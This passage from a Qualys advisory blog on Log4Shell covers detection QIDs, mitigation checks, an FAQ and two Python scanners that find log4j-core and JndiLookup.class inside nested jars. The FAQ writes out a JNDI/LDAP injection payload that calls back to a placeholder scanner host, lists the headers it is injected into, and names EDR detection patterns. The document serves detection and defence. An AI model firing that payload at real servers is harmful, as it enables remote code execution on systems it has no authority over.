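# Entry names as laid out in real log4j-core jars (assumption stated in the lead-in).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
_PRERELEASE_RANK = {"alpha": 0, "beta": 1, "rc": 2}  # a final release ranks 9


def parse_version(text: str) -> tuple:
    """'2.0-beta9' -> (2, 0, 0, 1, 9); '2.15.0' -> (2, 15, 0, 9, 0); tuples sort correctly."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?", text.strip().lower())
    if not m:
        raise ValueError(f"unrecognised log4j version string: {text!r}")
    major, minor, patch = int(m[1]), int(m[2]), int(m[3] or 0)
    if m[4]:
        return (major, minor, patch, _PRERELEASE_RANK[m[4]], int(m[5]))
    return (major, minor, patch, 9, 0)


def classify_version(text: str) -> str:
    """Name the most severe Log4Shell-family CVE a log4j-core version still carries."""
    key = text.strip().lower()
    v = parse_version(key)
    if v[0] != 2:
        return "not-log4j2"      # 1.x is a separate code base (CVE-2021-4104 needs writable config)
    if v < parse_version("2.0-beta9"):
        return "unaffected"
    if key in ("2.3.1", "2.12.3"):
        return "fixed"           # branch releases with JNDI removed and the recursion DoS fixed
    if key == "2.12.2":
        return "CVE-2021-45105"  # JNDI removed, but predates the 2.12.3 recursion fix
    if v < parse_version("2.15.0"):
        return "CVE-2021-44228"
    if v == parse_version("2.15.0"):
        return "CVE-2021-45046"  # 2.15.0 only disabled message lookups by default
    if v < parse_version("2.17.0"):
        return "CVE-2021-45105"
    return "fixed"               # CVE-2021-44832 (writable config, fixed in 2.17.1) is out of scope


def verdict(version: Optional[str], jndi_present: bool) -> str:
    """Combine the version classification with whether JndiLookup.class was stripped."""
    if version is None:
        return "JndiLookup present, version unknown" if jndi_present else "no log4j-core marker"
    cve = classify_version(version)
    if cve in ("CVE-2021-44228", "CVE-2021-45046") and not jndi_present:
        return f"{cve} mitigated (JndiLookup.class removed)"
    return cve


Finding = Tuple[str, Optional[str], bool, str]  # (path, version, jndi_present, verdict)


def assess_archive(path: str, data: bytes) -> List[Finding]:
    """Inspect one zip-based archive and every jar/war/ear nested inside it."""
    findings: List[Finding] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        jndi_present = JNDI_LOOKUP_CLASS in names
        if version is not None or jndi_present:  # shaded jars carry the class without the pom
            findings.append((path, version, jndi_present, verdict(version, jndi_present)))
        for name in sorted(names):
            if name.lower().endswith((".jar", ".war", ".ear")):
                findings.extend(assess_archive(f"{path}!/{name}", zf.read(name)))
    return findings


def build_archive(version: Optional[str], with_jndi: bool,
                  nested: Optional[Dict[str, bytes]] = None) -> bytes:
    """Construct a minimal archive in memory (sample data, not a real log4j build)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version:
            zf.writestr(POM_PROPERTIES, f"version={version}\nartifactId=log4j-core\n")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        for name, blob in (nested or {}).items():
            zf.writestr(name, blob)
    return buf.getvalue()


# Constructed inputs: a vulnerable jar, the same jar with the class stripped, a fixed
# jar, a WAR bundling 2.15.0 under WEB-INF/lib, and a shaded app jar with no pom.
SAMPLES: Dict[str, bytes] = {
    "log4j-core-2.14.1.jar": build_archive("2.14.1", True),
    "log4j-core-2.14.1-stripped.jar": build_archive("2.14.1", False),
    "log4j-core-2.17.1.jar": build_archive("2.17.1", True),
    "app.war": build_archive(None, False,
                             {"WEB-INF/lib/log4j-core-2.15.0.jar": build_archive("2.15.0", True)}),
    "shaded-app.jar": build_archive(None, True),
}


def scan_samples() -> Dict[str, str]:
    """Run the assessor over the constructed samples; returns {path: verdict}."""
    return {f[0]: f[3] for name, data in SAMPLES.items() for f in assess_archive(name, data)}
```

Two design points worth keeping when adapting this to a real file tree: a missing pom.properties with JndiLookup.class present is reported rather than ignored, because shaded and repackaged jars are exactly where version-based scanners miss; and a stripped class only downgrades the RCE verdicts, since the recursion DoS of CVE-2021-45105 is not addressed by removing JndiLookup.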
These QIDs will be available starting with vulnsigs version VULNSIGS-2.5.352-3 and Cloud Agent manifest version lx_manifest-2.5.352.3-1.

| **QID** | **Title** | **Version** | **Available for** |
|---|---|---|---|
| 376157 | Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell) | VULNSIGS-2.5.352-3 / 2.5.352.3-2 | Scanner, Cloud Agent |
| 730297 | Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell) (Unauthenticated) | VULNSIGS-2.5.352-3 | Scanner |
| 150440 | Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228) | VULNSIGS-2.5.352-3 | WAS |
| 178935 | Debian Security Update for apache-log4j2 (DLA 2842-1) | VULNSIGS-2.5.353-2 / 2.5.353.2-1 | Scanner, Cloud Agent |
| 178934 | Debian Security Update for apache-log4j2 (DSA 5020-1) | VULNSIGS-2.5.353-2 / 2.5.353.2-1 | Scanner, Cloud Agent |
| 317114 | Cisco Secure Web Appliance Log4j Remote Code Execution (RCE) Vulnerability (CSCwa47278) | VULNSIGS-2.5.353-2 | Scanner |
| 317118 | Cisco Application Policy Infrastructure Controller (APIC) Apache Log4j Vulnerability (cisco-sa-apache-log4j-qRuKNEbd) | VULNSIGS-2.5.353-2 | Scanner |
| 317117 | Cisco Integrated Management Controller (IMC) Apache Log4j Vulnerability (cisco-sa-apache-log4j-qRuKNEbd) | VULNSIGS-2.5.353-2 | Scanner |
| 317115 | Cisco SD-WAN Log4j Remote Code Execution (RCE) Vulnerability (CSCwa47745) | VULNSIGS-2.5.353-2 | Scanner |
| 198604 | Ubuntu Security Notification for Apache Log4j 2 Vulnerability (USN-5192-1) | VULNSIGS-2.5.356-2 / 2.5.356.2-1 | Scanner, Cloud Agent |
| 376178 | Apache Log4j Remote Code Execution (RCE) Vulnerability (CVE-2021-45046) | VULNSIGS-2.5.356-2 / 2.5.356.2-1 | Scanner, Cloud Agent |
| 376160 | Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell) Detected Based on Qualys Log4j scan Utility | VULNSIGS-2.5.356-4 / 2.5.356.4-3 | Scanner, Cloud Agent |
| 198606 | Ubuntu Security Notification for Apache Log4j 2 Vulnerability (USN-5197-1) | VULNSIGS-2.5.357-4 / 2.5.357.4-3 | Scanner, Cloud Agent |
| 216275 | VMware vCenter Server 7.0 Apache Log4j Remote Code Execution (RCE) Vulnerability (VMSA-2021-0028) | VULNSIGS-2.5.357-4 | Scanner |
| 216276 | VMware vCenter Server 6.7 Apache Log4j Remote Code Execution (RCE) Vulnerability (VMSA-2021-0028) | VULNSIGS-2.5.357-4 | Scanner |
| 216277 | VMware vCenter Server 6.5 Apache Log4j Remote Code Execution (RCE) Vulnerability (VMSA-2021-0028) | VULNSIGS-2.5.357-4 | Scanner |
| 282110 | Fedora Security Update for log4j (FEDORA-2021-f0f501d01f) | VULNSIGS-2.5.357-4 / 2.5.357.4-3 | Scanner, Cloud Agent |
| 317119 | Cisco Firepower Threat Defense (FTD) software Vulnerability in Apache Log4j (cisco-sa-apache-log4j-qRuKNEbd) | VULNSIGS-2.5.357-4 | Scanner |
| 376184 | VMware Identity Manager (vIDM) and Workspace ONE Access Apache Log4j Remote Code Execution (RCE) Vulnerability (VMSA-2021-0028) | VULNSIGS-2.5.357-4 / 2.5.357.4-3 | Scanner, Cloud Agent |
| 376183 | VMware NSX-T Apache Log4j Remote Code Execution (RCE) Vulnerability (VMSA-2021-0028) | VULNSIGS-2.5.357-4 / 2.5.357.4-3 | Scanner, Cloud Agent |
| 376185 | DataDog Agent Log4j Remote Code Execution (RCE) Vulnerability | VULNSIGS-2.5.357-5 / 2.5.357.5-4 | Scanner, Cloud Agent |
| 376187 | Apache Log4j 1.2 Remote Code Execution Vulnerability | VULNSIGS-2.5.357-5 / 2.5.357.5-4 | Scanner, Cloud Agent |
| 730301 | Apache Solr Affected By Apache Log4J Vulnerability (Log4Shell) | VULNSIGS-2.5.357-8 | Scanner |
| 150441 | Forms Vulnerable to Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228) | VULNSIGS-2.5.357-8 | WAS |
| 376193 | Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell) Detected Based on Qualys Log4j scan Utility (CVE-2021-45046) | VULNSIGS-2.5.357-8 / 2.5.357.8-7 | Scanner, Cloud Agent |
| 376194 | Apache Log4j Denial of Service (DOS) Vulnerability (Log4Shell) | VULNSIGS-2.5.357-9 / 2.5.357.9-8 | Scanner, Cloud Agent |
| 376195 | Apache Log4j Denial of Service (DOS) Vulnerability (Log4Shell) Detected Based on Qualys Log4j scan Utility | VULNSIGS-2.5.357-9 / 2.5.357.9-8 | Scanner, Cloud Agent |
| 178945 | Debian Security Update for apache-log4j2 (DSA 5024-1) | VULNSIGS-2.5.359-2 / 2.5.359.2-1 | Scanner, Cloud Agent |
| 198613 | Ubuntu Security Notification for Apache Log4j 2 Vulnerability (USN-5203-1) | VULNSIGS-2.5.359-2 / 2.5.359.2-1 | Scanner, Cloud Agent |
| 282173 | Fedora Security Update for log4j (FEDORA-2021-017d19088b) | VULNSIGS-2.5.359-2 / 2.5.359.2-1 | Scanner, Cloud Agent |
| 751506 | OpenSUSE Security Update for log4j (openSUSE-SU-2021:1577-1) | VULNSIGS-2.5.359-2 / 2.5.359.2-1 | Scanner, Cloud Agent |
| 751493 | OpenSUSE Security Update for log4j (openSUSE-SU-2021:4107-1) | VULNSIGS-2.5.359-2 / 2.5.359.2-1 | Scanner, Cloud Agent |
| 751499 | OpenSUSE Security Update for log4j (openSUSE-SU-2021:4094-1) | VULNSIGS-2.5.359-2 / 2.5.359.2-1 | Scanner, Cloud Agent |
| 376192 | Elasticsearch Logstash Log4j Remote Code Execution (RCE) Vulnerability | VULNSIGS-2.5.359-2 / 2.5.359.2-1 | Scanner, Cloud Agent |
| 751496 | OpenSUSE Security Update for log4j (openSUSE-SU-2021:1586-1) | VULNSIGS-2.5.359-2 / 2.5.359.2-1 | Scanner, Cloud Agent |
| 751524 | OpenSUSE Security Update for log4j12 (openSUSE-SU-2021:4112-1) | VULNSIGS-2.5.359-2 / 2.5.359.2-1 | Scanner, Cloud Agent |
| 751525 | OpenSUSE Security Update for log4j (openSUSE-SU-2021:4111-1) | VULNSIGS-2.5.359-2 / 2.5.359.2-1 | Scanner, Cloud Agent |
| 751508 | OpenSUSE Security Update for log4j (openSUSE-SU-2021:3999-1) | VULNSIGS-2.5.359-2 / 2.5.359.2-1 | Scanner, Cloud Agent |
| 751523 | SUSE Enterprise Linux Security Update for log4j (SUSE-SU-2021:4115-1) | VULNSIGS-2.5.359-2 / 2.5.359.2-1 | Scanner, Cloud Agent |
| 751522 | SUSE Enterprise Linux Security Update for log4j (SUSE-SU-2021:4111-1) | VULNSIGS-2.5.359-2 / 2.5.359.2-1 | Scanner, Cloud Agent |

## Detecting Mitigations

Qualys customers can leverage the output of the following QIDs to detect if the **log4j2.formatMsgNoLookups** property is set:

45241 - UNIX Daemon/Services Listed Under Root User

45240 - UNIX Daemon/Services Listed Under Non-Root Users

Qualys customers can also leverage the output of the following QIDs to detect if **LOG4J_FORMAT_MSG_NO_LOOKUPS** is set to true:

QID: 48196 Windows Host Environment Variables Detected

QID: 115041 Unix Environment Variables

## **Discover Log4j packages Using Qualys CSAM**

To secure your infrastructure from the Log4j vulnerability, you first need in-depth visibility into all the software components that are vulnerable. Identifying and updating these components will reduce the attack surface of your infrastructure.

Log4j may be installed explicitly, or it can be included in a Java application as a transitive dependency of common Java libraries. If Log4j is installed explicitly or is in the class path of a running Java application, then Qualys CSAM will inventory it and we can currently show you where Log4j is present within your environment.

Qualys CSAM makes it easy to identify assets containing Log4j. Please use the following QQL query to identify such assets.

Query: `software:(name:"log4j" or name:"liblog4j2")`

When searching for log4j in Qualys CSAM, please understand that log4j could be renamed and installed with different prefixes such as, but not limited to, log4j2-java, liblog4j2 or log4j2. There could be many different variations of this file name. Currently, the QQL search shows results only for an exact match and not for a prefix/suffix. We are also actively working to improve the QQL token software:(name:) to work with prefix and suffix.

#### Default rule to tag all software using Log4j

Please note that a new rule will be automatically published in your Qualys CSAM account to list and tag all the software applications that are vulnerable or potentially vulnerable due to their use of a vulnerable Log4j component. This rule takes into consideration an extensive list of software applications and utilities created by vendors like Microsoft, Cisco, RedHat, Juniper, Dell, HPE, BMC, Oracle, Riverbed, Siemens, Philips, NetApp, etc.
This rule will be continuously updated to reflect the latest status as vendors release new patches that upgrade their Log4j version. The rule named "Apps with Log4j – potentially vulnerable" will be disabled by default and needs to be enabled explicitly.

Once the hosts containing vulnerable software are identified, they can be grouped together with a 'dynamic tag', let us say "Log4j". This helps in automatically grouping existing hosts with the above vulnerabilities as well as any new assets that spin up in your environment. Tagging makes these grouped assets available for querying, reporting, prioritizing, scanning and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).

#### Dedicated Inventory Dashboard

To help you quickly find vulnerable hosts and software, a new dashboard has been created in Qualys CSAM. This dashboard has very useful widgets listing all the vulnerable hosts, applications with vulnerable versions of log4j, and most importantly all the vulnerable hosts visible on the Internet. Dedicated widgets named 'External Attack Surface' populate all vulnerable hosts that are visible on [Shodan](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and are low-hanging opportunities for attackers. These widgets also list workloads hosted on shared cloud infrastructure that have public IP addresses. All the apps containing log4j, in which the default bundled version of log4j is vulnerable, are listed as 'potentially vulnerable apps'.

## **Discover Vulnerable Log4j packages Using Qualys VMDR**

You can see all your impacted hosts for this vulnerability in the vulnerabilities view by using the QQL query:

`vulnerabilities.vulnerability.qid:[730297,376157]`

## **Prioritize Based on RTIs**

Using VMDR, the Log4j vulnerabilities can be prioritized using the following real-time threat indicators (RTIs):

 * Predicted_High_Risk
 * Wormable
 * Remote_Code_Execution
 * Unauthenticated_Exploitation

## **Detect Impacted Assets with Threat Protection**

VMDR also enables you to automatically map assets vulnerable to these vulnerabilities using [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>).

## **Remediate Using Qualys Patch Management**

Remediating this vulnerability is not straightforward, as the vulnerability is in a library that is used by a Java application. As such, Qualys Patch Management can be used for different types of remediation, which depend on the specific vulnerable Java application.

 * In case the vendor of the Java application releases a patch, customers can use Qualys Patch Management to deploy the patch. Updating the version is not possible.
 * Customers can use Qualys Patch Management to remove the JndiLookup.class, as recommended by Apache Log4j (<https://logging.apache.org/log4j/2.x/>), from the log4j jar. To do so, customers can create a pre action to execute the following command as recommended by Apache Log4j: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`
 * Customers can use the pre actions to create an action that will replace the old log4j jar with the 2.16.0 jar.
 * In more complex situations, pre actions can be used to update the environment variables or system properties as suggested by Apache Log4j.
 * Note that it is highly likely that a reboot will be needed after the changes recommended above are applied. We recommend utilizing the pre action ability to force a reboot to ensure the application has been restarted.

## **Dashboard**

With the VMDR Dashboard, you can track this vulnerability, its impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerability trends in your environment using the "Log4j" Dashboard.

[QLYS-Apache_Log4J2___Global_Insights](<https://blog.qualys.com/wp-content/uploads/2021/12/QLYS-Apache_Log4J2___Global_Insights.zip>) [Download](<https://blog.qualys.com/wp-content/uploads/2021/12/QLYS-Apache_Log4J2___Global_Insights.zip>)

## **Free 30-Day VMDR Service**

To help security teams assess and mitigate their risk exposure to the Log4j vulnerabilities (Log4j), Qualys is offering an [integrated VMDR service](<https://www.qualys.com/forms/vmdr/>) free for 30 days to identify vulnerable assets.

## **Detecting the Vulnerability with Qualys WAS**

For details on Qualys WAS Log4Shell detection, please refer to: <https://blog.qualys.com/vulnerabilities-threat-research/2021/12/15/is-your-web-application-exploitable-by-log4shell-cve-2021-44228-vulnerability>

The Qualys WAS Research team has released QID 150440 to production in order to detect web applications vulnerable to the Apache Log4j2 zero-day vulnerability (CVE-2021-44228).
On affected versions of Log4j, a zero-day vulnerability exists in JNDI (Java Naming and Directory Interface) features, made public on December 9, 2021, that results in remote code execution (RCE).

The WAS module uses our Out-of-Band detection mechanism to inject payloads into the request headers listed below. The following request headers will be tested:

 1. X-Api-Version
 2. User-Agent
 3. Referer
 4. X-Druid-Comment
 5. Origin
 6. Location
 7. X-Forwarded-For
 8. Cookie
 9. X-Requested-With
 10. X-Forwarded-Host
 11. Accept

We are working on other headers and will update our signatures as needed.

The above headers will be tested at the base URL and several directories up and down (adhering to scope rules) to ensure each application is thoroughly tested.

As part of the test to detect the presence of the vulnerability, the WAS engine sends an HTTP GET request with a specially crafted payload inside the request headers; vulnerable servers will make a DNS query that triggers the Qualys Periscope detection mechanism.

Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the target system.

Unique payloads between the DNS server and our web server confirm the requests, making this technique very accurate in identifying the vulnerability.

Given the detection mechanism and payload confirmation, there is no room for false positives in this approach.

QID 150440 has been added to the WAS Core Detection Scope, so all scans using the Core detection will include this QID in scanning as well. However, to expedite testing for CVE-2021-44228 across all of your web applications, it is recommended that you create a new scanning Option Profile to limit testing to only this specific vulnerability. This can be done by creating a new Option Profile and selecting "Custom Search Lists" under the Detection Scope to create a new static list.

Complete the creation wizard and add QID 150440 to the Static Search List.

Additionally, we recommend limiting the scan to a maximum of between 50 and 100 links in scope.

Scanning with this option profile will achieve two things to expedite testing your web applications in the most efficient way possible. First, we are only testing for one specific vulnerability, QID 150440. Second, as this vulnerability is only tested at the base URI and several directories up and down as appropriate, there is no need to crawl and test every link in the application. These two changes will allow each web application to be scanned faster than full Core detection scans while still providing you the necessary visibility of any vulnerable versions of Log4j2.

## **Detecting Exploits & Malware with Qualys Multi-Vector EDR**

Qualys Multi-Vector EDR will detect exploits, malware, and Indicators of Compromise (IOC) associated with Log4Shell and will be continually updated as more are discovered in the following months.

Multi-Vector EDR collects endpoint telemetry and will flag suspicious activity associated with the vulnerability:

 1. Detects java.exe processes with an LDAP network connection
 2. Searches for Log4j vulnerabilities by collecting and inventorying all .jar files on a system
 3. Detects internal lateral movement attempts by flagging curl.exe and Log4j payloads
 4. Detects java.exe processes that spawn unusual child processes

## **Detect Exploitation Attempts with Qualys XDR (beta)**

[XDR](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/14/detect-exploitation-attempts-with-qualys-xdr-beta>) (currently in Beta) can detect evidence of exploits across the network:

 1. Search for Log4j exploit attempts using QQL
 2. Create an alert notification rule based on the QQL using the Rule Editor
 3. Search for Command & Control connections (IP addresses & domains) interactively via QQL and automatically via threat intelligence feed integration

## Webinar: Qualys' Response to the Log4Shell Vulnerability

Please join Qualys for a Q&A and discussion on the Apache Log4j2 vulnerability.

 * Monday, December 13, at 10:00 am Pacific Time. Register at <https://qualys.com/log4j-webinar>.
 * Monday, December 13, at 2:00 pm Pacific Time. Register at <https://qualys.com/log4j-webinar-2>.

## **Vendor References**

 * <https://logging.apache.org/log4j/2.x/security.html>

## **Frequently Asked Questions**

### **What versions of Log4j are affected?**

All versions of Log4j from 2.0-beta9 to 2.15.0 are affected by this vulnerability.

### **When will the QIDs be available?**

The QIDs will be released at 11 PM ET on Dec 10th, 2021, and will be part of vulnsigs version VULNSIGS-2.5.352-3 and Cloud Agent manifest version lx_manifest-2.5.352.3-1.

### **What is the detection logic for QID 730297?**

QID 730297 is a remote unauthenticated check.
It sends an HTTP GET to the remote web server and tries to inject the payload

`${jndi:ldap://<SCANNER_IP>:<SCANNER_PORT>/QUALYSTEST}`

to exploit the vulnerability and receive a connection back to the scanner.

Following are the parameters into which the QID tries to inject the payload:

 * X-Api-Version
 * User-Agent
 * Cookie
 * Referer
 * Accept-Language
 * Accept-Encoding
 * Upgrade-Insecure-Requests
 * Accept
 * upgrade-insecure-requests
 * Origin
 * Pragma
 * X-Requested-With
 * X-CSRF-Token
 * Dnt
 * Content-Length
 * Access-Control-Request-Method
 * Access-Control-Request-Headers
 * Warning
 * Authorization
 * TE
 * Accept-Charset
 * Accept-Datetime
 * Date
 * Expect
 * Forwarded
 * From
 * Max-Forwards
 * Proxy-Authorization
 * Range
 * Content-Disposition
 * Content-Encoding
 * X-Amz-Target
 * X-Amz-Date
 * Content-Type
 * Username
 * IP
 * IPaddress
 * Hostname
 * X-CSRFToken
 * X-XSRF-TOKEN
 * X-ProxyUser-Ip

Additionally, payloads are now also included:

 * In the body of a request
 * In place of the request method
 * In place of the URI

### **Under what situations would QID 730297 not detect the vulnerability?**

QID 730297 tries to exploit the vulnerability via the parameters mentioned above. If the application is not logging any of the parameters mentioned above, the QID will not be detected.

### **What is the detection logic for QID 376157?**

QID 376157 is an authenticated check. This detection is based on querying the OS package managers on the target. If the target has a log4j package with a version less than 2.15.0, the target is flagged as vulnerable.

Update – Dec 11th 11:30pm EST

We have added 2 additional updates to the QID. We have updated the logic to find log4j installs using the locate command. We have also updated the logic to identify the running Log4j process using the ls proc command. These updates are in VULNSIGS-2.5.352-4.

Update – December 14, 2021 2:10 PM ET

We have updated the detection logic for QID 376157 to support the Windows operating system. The detection logic for Windows uses WMI to enumerate the running processes and identifies log4j included in a process via its command line.

QID 376157 is a version-based check. Please note that mitigation is not equal to remediation, and if customers have put mitigation controls in place but still have a vulnerable version of Log4j, Qualys will continue to flag QID 376157 on their system. The mitigation QID is provided so that customers can get a better understanding of their environment. It should not be considered a replacement for patching.

### **Under what situations would QID 376157 not detect the vulnerability?**

QID 376157 leverages the OS package manager to identify vulnerable Log4j packages. If the target does not have the vulnerable log4j package installed via the package manager, this QID might not get detected. This would typically happen when an application bundles the Log4j library in a jar, etc.

Please run `rpm -qa` or the equivalent on the target and see if log4j is registered. Please note that if log4j is not in the output, Qualys would not flag the QID. Qualys is actively investigating other options to identify this vulnerability. We will continue to update [this blog](<http://web.archive.org/web/20211214210154/https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell>) as we make progress.

If log4j is installed with the OS package manager (i.e. it appears in the output of `rpm -qa`) and the QID is still not detected, we need to run a debug scan to identify why the QID is not getting flagged. Please refer to the following link for steps to run a debug scan: [https://success.qualys.com/support/s/article/000001825](<http://web.archive.org/web/20211214210154/https://success.qualys.com/support/s/article/000001825>) with [Qualys Support](<http://web.archive.org/web/20211214210154/https://www.qualys.com/support/>).

_Update – Dec 11th 11:30pm EST_

If access to /proc/*/fd is restricted, or if log4j is embedded inside other binaries such as jar, war, etc., or the log4j jar filename doesn't have a file version, this QID may not be detected. Also, if the locate command is not available on the target, this QID might not be detected.

Update – December 14, 2021 2:10 PM ET

On Windows systems, the QID leverages WMI to identify log4j instances. If access to WMI is restricted, or log4j is embedded inside other binaries such as jar, war, etc., or the log4j jar filename doesn't have a file version, this QID may not be detected.

### **What is the difference between QID 730297 and QID 376157?**

QID 730297 is a remote unauthenticated QID and 376157 is an authenticated QID.

### **Does Qualys WAS have a detection?**

_Update - Dec 11th 11:30pm EST_

Yes! Qualys WAS has the following QID: 150440 with VULNSIGS-2.5.352-4.

### What should customers do if there are false negatives for remote detection QID 730297 on higher ports?

We recommend allowing bidirectional communication between the scanner and target on all ports. At the time of the scan, the scanner is scanning multiple IP addresses, so for each IP it scans it provides a unique port (usually a high-numbered port) to connect back to. Once the scanner gets the connection back from the target on the high port, it confirms the vulnerability. Which port the target will connect back to is not known ahead of the scan. Hence the communication between the scanner and targets needs to be white-listed in both directions.

### When will authenticated detection for Windows be available?

QID 376157 is updated to support the Windows operating system with version VULNSIGS-2.5.354-2 QAGENT-SIGNATURE-SET-2.5.354.2-1.

### What are the ports on which the Remote QID would be flagged?

The QID would be tested and flagged (if found vulnerable) on any port (included in the scan) where the web service is running.

### Is log4j-api also vulnerable?

No. Apache maintainers updated the [advisory](<https://logging.apache.org/log4j/2.x/security.html>) to confirm that only log4j-core is vulnerable. We have updated our signatures to accommodate this change in VULNSIGS-2.5.353-2.

### Does QID 376157 check for the Log4j 1.x version as well?

No. The vulnerability for Log4j 1.x is tracked via CVE-2021-4104. This blog will be updated as we release new QIDs for the same.

#### Update – December 17, 2021 2:06 PM ET

Added QID 376187 for Apache Log4j 1.2 Remote Code Execution Vulnerability.

### **Would Qualys update/release more QIDs for this vulnerability?**

Yes. We expect more QIDs will be created for this CVE as more vendors release updates for this vulnerability.
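The FAQ above notes that QID 376157 keys on the OS package manager (plus locate, ls proc and WMI) and may miss Log4j bundled inside a jar or war, and the Patch Management section recommends deleting JndiLookup.class from log4j-core. The following script is an added example, not the Qualys Log4j scan utility or the QID's logic: it walks a directory, opens every jar/war/ear (recursing into nested archives, so a renamed jar inside WEB-INF/lib is still found), reads the log4j-core version from the Maven pom.properties entry and reports whether JndiLookup.class is still present. The three archives it builds for the demonstration are constructed fixtures, not real Log4j bytes.

```python
"""Inventory log4j-core copies bundled inside jar/war/ear archives (nested or renamed)
and check whether JndiLookup.class is still present. Added example, not Qualys code."""
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import Dict, Iterator, List, Optional

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J_CORE_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
SECURITY_BACKPORTS = {"2.12.2", "2.12.3", "2.3.1"}  # fixed without moving to 2.16.0


@dataclass
class Finding:
    location: str             # outer path; nested members are appended after "!/"
    version: Optional[str]    # from log4j-core pom.properties, None if absent
    jndi_lookup_present: bool
    affected: bool            # in the CVE-2021-44228 range with JndiLookup.class present


def parse_pom_version(pom_properties: str) -> Optional[str]:
    """Return the 'version=' value from a Maven pom.properties file."""
    for line in pom_properties.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def version_in_affected_range(version: str) -> bool:
    """log4j-core 2.x below 2.16.0, minus the backport releases. Pre-release tags such as
    2.0-beta9 compare on their numeric prefix, so all of 2.0-* counts as affected."""
    if version in SECURITY_BACKPORTS:
        return False
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m or int(m.group(1)) != 2:
        return False
    return (int(m.group(2)), int(m.group(3) or 0)) < (16, 0)


def inspect_archive(data: bytes, location: str) -> Iterator[Finding]:
    """Inspect one zip-format archive held in memory, recursing into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip container, nothing to inspect
    with zf:
        names = set(zf.namelist())
        has_lookup = JNDI_LOOKUP_CLASS in names
        version = None
        if LOG4J_CORE_POM in names:
            version = parse_pom_version(zf.read(LOG4J_CORE_POM).decode("utf-8", "replace"))
        if has_lookup or version is not None:
            # A shaded/fat jar without Maven metadata but with the lookup class is reported
            # as affected rather than silently skipped; confirm its version by hand.
            affected = has_lookup and (version is None or version_in_affected_range(version))
            yield Finding(location, version, has_lookup, affected)
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                yield from inspect_archive(zf.read(name), location + "!/" + name)


def scan_tree(root: str) -> List[Finding]:
    """Scan every archive under root; contents decide, the file name is only a hint."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), path))
    return findings


def _fake_log4j_core(version: Optional[str], with_lookup: bool) -> bytes:
    """Constructed fixture: a jar holding only the two entries the scanner keys on."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        if version is not None:
            z.writestr(LOG4J_CORE_POM, f"artifactId=log4j-core\nversion={version}\n")
        if with_lookup:
            z.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def demo() -> Dict[str, Finding]:
    """Build three constructed cases in a temp dir, scan them, key results by jar name."""
    with tempfile.TemporaryDirectory() as tmp:
        # vulnerable 2.14.1 nested in a war under a renamed jar (defeats name-based checks)
        with zipfile.ZipFile(os.path.join(tmp, "app.war"), "w") as war:
            war.writestr("WEB-INF/lib/logging-lib.jar", _fake_log4j_core("2.14.1", True))
        # same version after 'zip -q -d ... JndiLookup.class' was applied
        with open(os.path.join(tmp, "mitigated.jar"), "wb") as f:
            f.write(_fake_log4j_core("2.14.1", False))
        # patched release: the class is still shipped, but the version is out of range
        with open(os.path.join(tmp, "log4j-core-2.17.1.jar"), "wb") as f:
            f.write(_fake_log4j_core("2.17.1", True))
        return {f.location.replace("\\", "/").rsplit("/", 1)[-1]: f for f in scan_tree(tmp)}


if __name__ == "__main__":
    for name, f in sorted(demo().items()):
        status = "AFFECTED" if f.affected else "ok"
        print(f"{status:8} version={f.version or '?':8} jndi={f.jndi_lookup_present} {name}")
```

Point `scan_tree()` at an application directory to get the same report for real deployments; an entry with an unknown version and the lookup class present needs a manual version check before it is closed out.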
Also, we expect more updates to QID 376157 and 730297.

ID QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F Type qualysblog Published 2021-12-10T19:30:11 Modified 2021-12-10T19:30:11
Title: CVE-2021-44228: Apache Log4j2 Zero-Day Exploited in the Wild (Log4Shell)
CVEs: CVE-2021-4104, CVE-2021-44228, CVE-2021-45046, CVE-2021-45105
